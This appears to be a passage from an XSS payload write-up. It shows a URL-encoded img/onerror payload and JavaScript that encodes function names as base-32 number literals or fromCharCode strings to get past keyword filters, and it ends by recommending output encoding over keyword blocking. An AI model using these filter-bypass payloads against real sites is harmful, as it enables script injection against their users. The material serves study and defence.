%3Cimg+src%3Dx+onerror%3Dtop[11189117..toString(32)]%601111%60%3E
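How the top[11189117..toString(32)] trick is built, so the literal for any filtered name can be derived instead of memorised. This is an added example, not code from the original post; the function names are my own.

```javascript
// Encode an identifier as the Number n such that n.toString(32) === name.
// Base-32 digits are 0-9 then a-v, so w-z, uppercase and underscore cannot
// be encoded; 10 characters is the limit before 2^53 precision is lost.
// Returns null when the name cannot be represented.
function base32Literal(name) {
  if (!/^[a-v0-9]{1,10}$/.test(name)) return null;
  const n = parseInt(name, 32);
  return n.toString(32) === name ? n : null; // rejects leading zeros
}

// What the browser does at runtime when the payload executes.
function decodeBase32Literal(n) {
  return n.toString(32);
}

// Build the obfuscated call. The double dot matters: "11189117." is a number
// literal with a trailing dot, and the second dot is the property access.
function obfuscatedCall(fnName, arg) {
  const n = base32Literal(fnName);
  if (n === null) return null;
  return `top[${n}..toString(32)](${arg})`;
}

// Fallback for names base-32 cannot express: spell them out with
// String.fromCharCode, as several payloads above do.
function fromCharCodeLiteral(s) {
  return `String.fromCharCode(${Array.from(s, c => c.charCodeAt(0)).join(",")})`;
}

console.log(obfuscatedCall("alert", 2222));      // the payload used above
console.log(obfuscatedCall("prompt", 1));
console.log(obfuscatedCall("xss", 1));           // null: 'x' is not a base-32 digit
console.log(fromCharCodeLiteral("alert(1)"));    // matches the setTimeout payload above
```

A filter that blocks the word alert but allows toString, top and square brackets is therefore not a filter; the only robust fix is output encoding for the context, not keyword blocking.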

References:
从0到1完全掌握 XSS
web攻防之XSS攻击详解——XSS简介与类型

XSS payload 大全 - Bypass - 博客园